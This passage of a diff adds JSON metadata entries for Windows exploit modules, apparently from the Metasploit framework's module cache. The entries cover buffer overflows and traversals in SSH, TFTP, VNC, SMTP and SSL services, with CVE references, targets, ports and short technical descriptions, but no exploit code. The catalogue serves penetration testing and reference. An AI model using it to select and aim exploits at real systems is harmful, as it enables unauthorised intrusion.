"exploit/windows/smtp/ypops_overflow1", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-09-27", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This module exploits a stack buffer overflow in the YPOPS POP3\n service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll", + "references": [ + "CVE-2004-1558", + "OSVDB-10367", + "BID-11256", + "URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0 Italian", + "Windows 2000 Advanced Server Italian SP4", + "Windows 2000 Advanced Server SP3 English", + "Windows 2000 SP0 English", + "Windows 2000 SP1 English", + "Windows 2000 SP2 English", + "Windows 2000 SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/ypops_overflow1.rb", + "is_install_path": true, + "ref_name": "windows/smtp/ypops_overflow1", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freeftpd_key_exchange": { + "name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow", + "fullname": "exploit/windows/ssh/freeftpd_key_exchange", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-05-12", + "type": "exploit", + "author": [ + "riaf " + ], + "description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.", + "references": [ + "CVE-2006-2407", + "OSVDB-25569", + "BID-17958" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English", + "Windows 2000 SP0-SP4 German", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freeftpd_key_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freesshd_authbypass": { + "name": "Freesshd Authentication Bypass", + "fullname": "exploit/windows/ssh/freesshd_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-08-11", + "type": "exploit", + "author": [ + "Aris", + "kcope", + "Daniele Martini ", + "Imran E. Dawoodjee (minor improvements)>" + ], + "description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). The exploit\n has been tested with both password and public key authentication.", + "references": [ + "CVE-2012-6066", + "OSVDB-88006", + "BID-56785", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html", + "URL-https://seclists.org/fulldisclosure/2010/Aug/132" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PowerShell", + "CmdStager upload" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freesshd_authbypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freesshd_key_exchange": { + "name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow", + "fullname": "exploit/windows/ssh/freesshd_key_exchange", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-05-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.", + "references": [ + "CVE-2006-2407", + "OSVDB-25463", + "BID-17958" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freesshd_key_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/putty_msg_debug": { + "name": "PuTTY Buffer Overflow", + "fullname": "exploit/windows/ssh/putty_msg_debug", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-12-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.", + "references": [ + "CVE-2002-1359", + "OSVDB-8044", + "URL-http://www.rapid7.com/advisories/R7-0009.html", + "BID-6407" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/putty_msg_debug.rb", + "is_install_path": true, + "ref_name": "windows/ssh/putty_msg_debug", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/securecrt_ssh1": { + "name": "SecureCRT SSH1 Buffer Overflow", + "fullname": "exploit/windows/ssh/securecrt_ssh1", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-07-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.", + "references": [ + "CVE-2002-1059", + "OSVDB-4991", + "BID-5287" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SecureCRT.exe (3.4.4)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb", + "is_install_path": true, + "ref_name": "windows/ssh/securecrt_ssh1", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/sysax_ssh_username": { + "name": "Sysax 5.53 SSH Username Buffer Overflow", + "fullname": "exploit/windows/ssh/sysax_ssh_username", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-27", + "type": "exploit", + "author": [ + "Craig Freyman", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.", + "references": [ + "OSVDB-79689", + "URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html", + "EDB-18535" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", + "Sysax 5.53 on Win2K3 SP1/SP2" + ], + "mod_time": "2022-04-18 09:36:52 +0000", + "path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb", + "is_install_path": true, + "ref_name": "windows/ssh/sysax_ssh_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssl/ms04_011_pct": { + "name": "MS04-011 Microsoft Private Communications Transport Overflow", + "fullname": "exploit/windows/ssl/ms04_011_pct", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). Using the wrong target may not result in an immediate\n crash of the remote system.", + "references": [ + "CVE-2003-0719", + "OSVDB-5250", + "BID-10116", + "MSB-MS04-011" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4", + "Windows 2000 SP3", + "Windows 2000 SP2", + "Windows 2000 SP1", + "Windows 2000 SP0", + "Windows XP SP0", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssl/ms04_011_pct.rb", + "is_install_path": true, + "ref_name": "windows/ssl/ms04_011_pct", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/telnet/gamsoft_telsrv_username": { + "name": "GAMSoft TelSrv 1.5 Username Buffer Overflow", + "fullname": "exploit/windows/telnet/gamsoft_telsrv_username", + "aliases": [], + "rank": 200, + "disclosure_date": "2000-07-17", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. The service terminates after exploitation,\n so you only get one chance!", + "references": [ + "CVE-2000-0665", + "OSVDB-373", + "BID-1478", + "URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip" + ], + "platform": "Windows", + "arch": "x86", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP0/4 English REMOTE", + "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", + "Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb", + "is_install_path": true, + "ref_name": "windows/telnet/gamsoft_telsrv_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/telnet/goodtech_telnet": { + "name": "GoodTech Telnet Server Buffer Overflow", + "fullname": "exploit/windows/telnet/goodtech_telnet", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.", + "references": [ + "CVE-2005-0768", + "OSVDB-14806", + "BID-12815" + ], + "platform": "Windows", + "arch": "", + "rport": 2380, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb", + "is_install_path": true, + "ref_name": "windows/telnet/goodtech_telnet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/attftp_long_filename": { + "name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow", + "fullname": "exploit/windows/tftp/attftp_long_filename", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-11-27", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.", + "references": [ + "CVE-2006-6184", + "OSVDB-11350", + "BID-21320", + "EDB-2887" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT SP4 English", + "Windows 2000 SP0 English", + "Windows 2000 SP1 English", + "Windows 2000 SP2 English", + "Windows 2000 SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0/1 English", + "Windows XP SP2 English", + "Windows XP SP3 English", + "Windows Server 2003", + "Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/attftp_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/attftp_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/distinct_tftp_traversal": { + "name": "Distinct TFTP 3.10 Writable Directory Traversal Execution", + "fullname": "exploit/windows/tftp/distinct_tftp_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-04-08", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits a directory traversal vulnerability in the TFTP\n Server component of Distinct Intranet Servers version 3.10 which\n allows a remote attacker to write arbitrary files to the server file\n system, resulting in code execution under the context of 'SYSTEM'.\n This module has been tested successfully on TFTP Server version 3.10\n on Windows XP SP3 (EN).", + "references": [ + "OSVDB-80984", + "EDB-18718", + "URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf", + "CVE-2012-6664" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb", + "is_install_path": true, + "ref_name": "windows/tftp/distinct_tftp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/tftp/dlink_long_filename": { + "name": "D-Link TFTP 1.0 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/dlink_long_filename", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-03-12", + "type": "exploit", + "author": [ + "LSO ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. For best results,\n use bind payloads with nonx (No NX).", + "references": [ + "CVE-2007-1435", + "OSVDB-33977", + "BID-22923" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows 2000 SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/dlink_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/dlink_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/futuresoft_transfermode": { + "name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow", + "fullname": "exploit/windows/tftp/futuresoft_transfermode", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-05-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).", + "references": [ + "CVE-2005-1812", + "OSVDB-16954", + "BID-13821" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows NT SP5/SP6a English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/futuresoft_transfermode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/netdecision_tftp_traversal": { + "name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution", + "fullname": "exploit/windows/tftp/netdecision_tftp_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-05-16", + "type": "exploit", + "author": [ + "Rob Kraus", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary file to the file system, which results in code execution under\n the context of user executing the TFTP Server.", + "references": [ + "CVE-2009-1730", + "OSVDB-54607", + "BID-35002" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" + ], + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb", + "is_install_path": true, + "ref_name": "windows/tftp/netdecision_tftp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/opentftp_error_code": { + "name": "OpenTFTP SP 1.4 Error Packet Overflow", + "fullname": "exploit/windows/tftp/opentftp_error_code", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-07-05", + "type": "exploit", + "author": [ + "tixxDZ", + "steponequit" + ], + "description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.", + "references": [ + "CVE-2008-2161", + "OSVDB-44904", + "BID-29111", + "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "OpenTFTP 1.4 Service", + "OpenTFTP 1.4 Stand Alone" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/opentftp_error_code.rb", + "is_install_path": true, + "ref_name": "windows/tftp/opentftp_error_code", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/quick_tftp_pro_mode": { + "name": "Quick FTP Pro 2.1 Transfer-Mode Overflow", + "fullname": "exploit/windows/tftp/quick_tftp_pro_mode", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-03-27", + "type": "exploit", + "author": [ + "Saint Patrick" + ], + "description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.", + "references": [ + "CVE-2008-1610", + "OSVDB-43784", + "BID-28459", + "URL-http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2000", + "Windows XP SP2" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/quick_tftp_pro_mode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpd32_long_filename": { + "name": "TFTPD32 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpd32_long_filename", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-11-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.", + "references": [ + "CVE-2002-2226", + "OSVDB-45903", + "BID-6199" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT 4.0 SP6a English", + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpd32_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpdwin_long_filename": { + "name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpdwin_long_filename", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-09-21", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.", + "references": [ + "CVE-2006-4948", + "OSVDB-29032", + "BID-20131", + "EDB-3132" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal - tftpd.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpdwin_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpserver_wrq_bof": { + "name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpserver_wrq_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-26", + "type": "exploit", + "author": [ + "Mati Aharoni", + "Datacut" + ], + "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result a denial-of-service.", + "references": [ + "CVE-2008-1611", + "OSVDB-43785", + "BID-18345", + "EDB-5314" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 EN Service Mode", + "Windows XP SP2/SP3 EN Standalone Mode", + "Windows 7 SP0/SP1 EN x64 Service Mode", + "Windows 7 SP0/SP1 EN x64 Standalone Mode", + "Windows 7 SP0/SP1 EN x86 Service Mode", + "Windows 7 SP0/SP1 EN x86 Standalone Mode" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpserver_wrq_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/threectftpsvc_long_mode": { + "name": "3CTftpSvc TFTP Long Mode Buffer Overflow", + "fullname": "exploit/windows/tftp/threectftpsvc_long_mode", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-11-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.", + "references": [ + "CVE-2006-6183", + "OSVDB-30758", + "BID-21301", + "URL-http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "3CTftpSvc 2.0.1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/threectftpsvc_long_mode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/unicenter/cam_log_security": { + "name": "CA CAM log_security() Stack Buffer Overflow (Win32)", + "fullname": "exploit/windows/unicenter/cam_log_security", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-08-22", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. This module has\n been tested on Unicenter v3.1.", + "references": [ + "CVE-2005-2668", + "OSVDB-18916", + "BID-14622" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "W2API.DLL TNG 2.3", + "Windows 2000 SP0-SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/unicenter/cam_log_security.rb", + "is_install_path": true, + "ref_name": "windows/unicenter/cam_log_security", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/realvnc_client": { + "name": "RealVNC 3.3.7 Client Buffer Overflow", + "fullname": "exploit/windows/vnc/realvnc_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2001-01-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).", + "references": [ + "CVE-2001-0167", + "OSVDB-6281", + "BID-2305" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/realvnc_client.rb", + "is_install_path": true, + "ref_name": "windows/vnc/realvnc_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/ultravnc_client": { + "name": "UltraVNC 1.0.1 Client Buffer Overflow", + "fullname": "exploit/windows/vnc/ultravnc_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-04-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in UltraVNC Win32\n Viewer 1.0.1 Release.", + "references": [ + "CVE-2006-1652", + "OSVDB-24456", + "BID-17378" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/ultravnc_client.rb", + "is_install_path": true, + "ref_name": "windows/vnc/ultravnc_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/ultravnc_viewer_bof": { + "name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow", + "fullname": "exploit/windows/vnc/ultravnc_viewer_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-02-06", + "type": "exploit", + "author": [ + "noperand" + ], + "description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.", + "references": [ + "CVE-2008-0610", + "OSVDB-42840", + "BID-27561" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb", + "is_install_path": true, + "ref_name": "windows/vnc/ultravnc_viewer_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/winvnc_http_get": { + "name": "WinVNC Web Server GET Overflow", + "fullname": "exploit/windows/vnc/winvnc_http_get", + "aliases": [], + "rank": 200, + "disclosure_date": "2001-01-29", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!", + "references": [ + "BID-2306", + "OSVDB-6280", + "CVE-2001-0168" + ], + "platform": "Windows", + "arch": "", + "rport": 5800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows NT4 SP3-6", + "Windows 2000 SP1-4", + "Windows XP SP0-1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/winvnc_http_get.rb", + "is_install_path": true, + "ref_name": "windows/vnc/winvnc_http_get", 